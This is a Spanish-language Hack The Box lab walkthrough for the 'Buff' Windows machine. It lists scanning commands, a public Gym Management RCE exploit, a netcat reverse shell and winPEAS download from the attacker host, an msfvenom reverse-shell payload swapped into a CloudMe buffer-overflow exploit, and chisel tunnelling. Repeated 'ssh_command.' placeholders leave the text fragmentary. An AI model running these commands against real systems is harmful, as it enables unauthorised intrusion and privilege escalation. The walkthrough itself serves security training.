Cu3rv0x
Buff

Buff


HTB Windows

nmap -A -p- -oA buff 10.129.191.5 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA active 10.129.191.5

nmap -sU -O -p- -oA buff-udp 10.129.191.5

nikto -h 10.129.191.5:8080

whatweb http://10.129.191.5:8080

ssh_command.

http://10.129.191.5:8080

ssh_command.

Hacemos un searchsploit Gym Management

ssh_command.

Bajamos el archivo

searchsploit -m 48506.py

ssh_command.

ssh_command.

python2 48506.py http://buff.htb:8080

ssh_command.

Vemos que es un shell falso y parece que siempre nos da el mismo resultado.

dir C:\Users\shaun\Desktop

ssh_command.

locate nc.exe

cp /usr/share/SecLists/Web-Shells/FuzzDb/nc.exe .

Para crear una mejor reverse shell.

ssh_command.

nc.exe -e cmd 10.10.14.110 443

rlwrap nc -lvnp 443

ssh_command.

Vemos que tipos de privilegios tenemos

whoami /priv

ssh_command.

whoami /all

ssh_command.

curl http://10.10.14.110/winPeasx86.exe -o winPEAS.exe

ssh_command.

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases

.\winPEAS.exe

ssh_command.

netstat -nat

Despues de ejecutar winPeas.exe y ver el resultado. Vemos el puerto 8888 que usa CloudMe

ssh_command.

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.110 LPORT=443 -b ‘\x00\x0A\x0D’ -f python -v payload Copiamos el resultado al script que obtenemos abajo y lo cambiamos el payload del script en 48389.py

ssh_command.

./chisel server —reverse -p 8000

.\chisel.exe client 10.10.14.110:8000 R:8888:localhost:8888

ssh_command.

nc -lvnp 443

ssh_command.

ssh_command.

© 2025 Cu3rv0x